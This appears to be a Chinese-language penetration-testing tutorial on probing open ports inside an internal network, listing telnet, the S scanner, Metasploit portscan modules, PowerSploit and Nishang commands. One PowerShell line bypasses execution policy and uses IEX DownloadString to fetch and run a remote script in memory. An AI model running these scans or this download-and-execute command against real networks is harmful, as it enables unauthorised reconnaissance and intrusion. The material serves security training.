探测内网端口
1.利用 Telnet 命令进行扫描
Telnet 协议是 TCP/IP 协议族的一员,是 Internet 远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在使用者计算机上使用 Telnet 程序,可以连接到目标服务器。如果只是想快速地探测某主机的某个常规高危端口是否开放,Telnet 命令是最方便的。Telnet 命令的简单使用实例:
显示连接失败,则端口没有开放。跳转到新的界面,加载出服务器信息,表示端口开放
C:\Windows\Temp>telnet 192.168.3.68 23
正在连接192.168.3.68...无法打开到主机的连接。 在端口 23: 连接失败
2.利用 S 扫描器
扫描器是早期的一种比较快速的端口扫描工具,特别适合运行在 Windows Sever 2003 以下的平台上,支持大网段扫描。S 扫描器的扫描结果默认保存在其目录下的 result.txt 文件中。推荐 使用 TCP 扫描,命令如下:
S.exe TCP 192.168.3.1 192.168.3.254 445,3389,1433,7001,1099,8080,80,22,23,21,25,110,3306,5432,1521,6379,2049,111 256 /Banner /save
3.利用 Metasploit 端口扫描
Metasploit 包含多种端口扫描技术,与其他扫描工具接口良好。在 msfconsole 下运行“search portscan”命令,即可进行搜索。
msf5 > search portscan
Matching Modules
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
4.PowerSploit 下的 Invoke-portscan.ps1 模块
PowerSploit 中的 Invoke-Portscan.ps1 脚本,且使用无文件形式的扫描
powershell.exe -nop -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('https://192.168.100.200/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\res.txt"
5.Nishang 下的 Invoke-PortScan 模块
Invoke-PortScan 是 Nishang 的端口扫描脚本,用于发现主机、解析主机名、端口扫描,是一个很实用的脚本。
Invoke-PortScan -StartAddress 192.168.3.1 -EndAddress 192.168.3.255 -ResolveHost